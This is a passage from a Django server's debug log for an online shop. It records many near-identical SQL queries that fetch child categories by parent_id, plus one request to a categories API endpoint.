2019-12-27 09:30:03,448 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:30:03,450 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:30:03,452 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:30:03,455 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:30:03,457 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:30:03,460 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:30:03,462 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:30:03,465 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:30:03,467 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:30:03,469 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:30:03,473 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:30:03,475 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:30:03,477 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:30:03,479 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:30:03,482 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:30:03,485 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:30:03,487 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:30:03,490 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:30:03,492 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:30:03,494 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:30:03,496 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:30:03,499 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 09:30:03,501 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 09:30:03,503 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 09:30:03,506 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 09:30:03,508 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 09:30:03] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 09:30:10,486 utils 2749 140297254205184 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:30:10,496 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:30:10,501 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:30:10,503 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:30:10,507 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:30:10,509 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:30:10,512 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:30:10,514 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:30:10,517 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:30:10,520 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:30:10,522 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:30:10,525 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:30:10,527 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:30:10,529 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:30:10,533 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:30:10,536 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:30:10,538 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:30:10,540 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:30:10,542 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:30:10,546 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:30:10,549 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:30:10,551 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:30:10,553 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:30:10,556 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:30:10,558 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:30:10,562 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:30:10,564 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:30:10,566 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:30:10,569 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:30:10,571 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:30:10,575 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:30:10,577 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:30:10,579 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:30:10,582 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:30:10,584 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:30:10,589 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:30:10,592 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:30:10,594 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 09:30:10,596 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 09:30:10,599 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 09:30:10,601 utils 2749 140297254205184 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 09:30:10,605 utils 2749 140297254205184 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 